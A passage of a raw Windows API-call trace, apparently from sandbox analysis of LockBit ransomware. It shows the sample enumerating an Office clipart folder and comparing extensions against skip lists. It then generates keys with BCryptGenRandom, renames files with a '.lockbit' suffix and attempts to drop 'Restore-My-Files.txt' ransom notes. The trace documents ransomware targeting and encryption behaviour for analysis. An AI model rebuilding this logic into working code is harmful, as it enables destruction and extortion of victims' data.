(lpString1="iconcache.db", lpString2="PH02829J.JPG") returned -1 [0172.785] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0172.785] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02829J.JPG") returned=".JPG" [0172.785] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0172.785] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0172.785] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0172.785] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0172.785] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0172.785] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0172.785] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0172.785] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0172.785] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0172.785] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0172.785] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0172.786] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0172.786] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0172.786] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0172.786] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0172.786] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0172.786] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0172.786] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02829J.JPG.lockbit") returned 72 [0172.786] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02829J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02829j.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0172.788] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0172.788] malloc (_Size=0x40068) returned 0x3d70450 [0172.788] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=62520) returned 1 [0172.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0172.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0172.789] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0172.844] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02829J.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02829J.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.844] malloc (_Size=0xa6) returned 0x1fa2ed8 [0172.844] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.318] free (_Block=0x1fa2ed8) [0173.319] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02829J.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.319] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.320] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.323] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66374600, ftCreationTime.dwHighDateTime=0x1bd4e5f, ftLastAccessTime.dwLowDateTime=0x6cebbbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66374600, ftLastWriteTime.dwHighDateTime=0x1bd4e5f, nFileSizeHigh=0x0, nFileSizeLow=0x30f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02845G.GIF", cAlternateFileName="")) returned 1 [0173.324] lstrcmpiW (lpString1=".", lpString2="PH02845G.GIF") returned -1 [0173.324] lstrcmpiW (lpString1="..", lpString2="PH02845G.GIF") returned -1 [0173.324] PathFindExtensionW (pszPath="PH02845G.GIF") returned=".GIF" [0173.324] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0173.326] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0173.326] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0173.326] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0173.328] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0173.328] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0173.328] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0173.328] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0173.329] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0173.329] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0173.329] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0173.329] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0173.329] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0173.331] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0173.331] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0173.332] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0173.332] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0173.332] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0173.332] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0173.332] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0173.332] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0173.332] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0173.332] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0173.335] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0173.335] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0173.335] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0173.335] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0173.335] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0173.336] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0173.336] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0173.336] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0173.336] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0173.336] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0173.336] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02845G.GIF") returned 1 [0173.336] lstrcmpiW (lpString1="ntldr", lpString2="PH02845G.GIF") returned -1 [0173.336] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02845G.GIF") returned -1 [0173.336] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02845G.GIF") returned -1 [0173.336] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02845G.GIF") returned -1 [0173.336] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02845G.GIF") returned 1 [0173.336] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02845G.GIF") returned -1 [0173.336] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.336] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02845G.GIF") returned=".GIF" [0173.336] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0173.336] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0173.336] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0173.336] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0173.336] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0173.336] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0173.336] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0173.336] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0173.336] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0173.336] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0173.336] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0173.336] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0173.336] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0173.336] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0173.337] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0173.337] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0173.337] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0173.337] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02845G.GIF.lockbit") returned 72 [0173.337] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02845G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02845g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0173.367] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.367] malloc (_Size=0x40068) returned 0x3df0008 [0173.367] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12530) returned 1 [0173.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0173.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0173.369] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0173.371] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02845G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02845G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.371] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.371] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.373] free (_Block=0x1fa2ed8) [0173.373] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02845G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.373] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.373] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.373] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a425410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3c45, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02897J.JPG", cAlternateFileName="")) returned 1 [0173.373] lstrcmpiW (lpString1=".", lpString2="PH02897J.JPG") returned -1 [0173.373] lstrcmpiW (lpString1="..", lpString2="PH02897J.JPG") returned -1 [0173.373] PathFindExtensionW (pszPath="PH02897J.JPG") returned=".JPG" [0173.373] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0173.373] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0173.373] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0173.373] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0173.373] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0173.373] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0173.374] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0173.374] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0173.374] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0173.374] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0173.374] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0173.374] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0173.374] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0173.374] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.374] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0173.374] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0173.374] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0173.374] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0173.375] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0173.375] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0173.375] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0173.375] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0173.375] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0173.375] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0173.375] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0173.375] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0173.375] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0173.375] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0173.375] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0173.375] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.375] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0173.375] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0173.375] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0173.375] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0173.375] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02897J.JPG") returned 1 [0173.375] lstrcmpiW (lpString1="ntldr", lpString2="PH02897J.JPG") returned -1 [0173.375] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02897J.JPG") returned -1 [0173.375] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02897J.JPG") returned -1 [0173.375] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02897J.JPG") returned -1 [0173.375] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02897J.JPG") returned 1 [0173.375] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02897J.JPG") returned -1 [0173.376] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.376] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02897J.JPG") returned=".JPG" [0173.376] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0173.376] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0173.376] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0173.376] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0173.376] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0173.376] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0173.376] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0173.376] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0173.376] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0173.376] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0173.376] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0173.376] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0173.377] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0173.377] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0173.377] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0173.377] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0173.377] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02897J.JPG.lockbit") returned 72 [0173.377] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02897J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02897j.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0173.379] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.379] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.379] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=15429) returned 1 [0173.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.380] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.382] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02897J.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02897J.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.382] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.382] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.383] free (_Block=0x1fa2ed8) [0173.383] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02897J.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.383] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.383] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.383] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0f66600, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x5a425410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe0f66600, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x3c76, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH03011U.BMP", cAlternateFileName="")) returned 1 [0173.383] lstrcmpiW (lpString1=".", lpString2="PH03011U.BMP") returned -1 [0173.383] lstrcmpiW (lpString1="..", lpString2="PH03011U.BMP") returned -1 [0173.383] 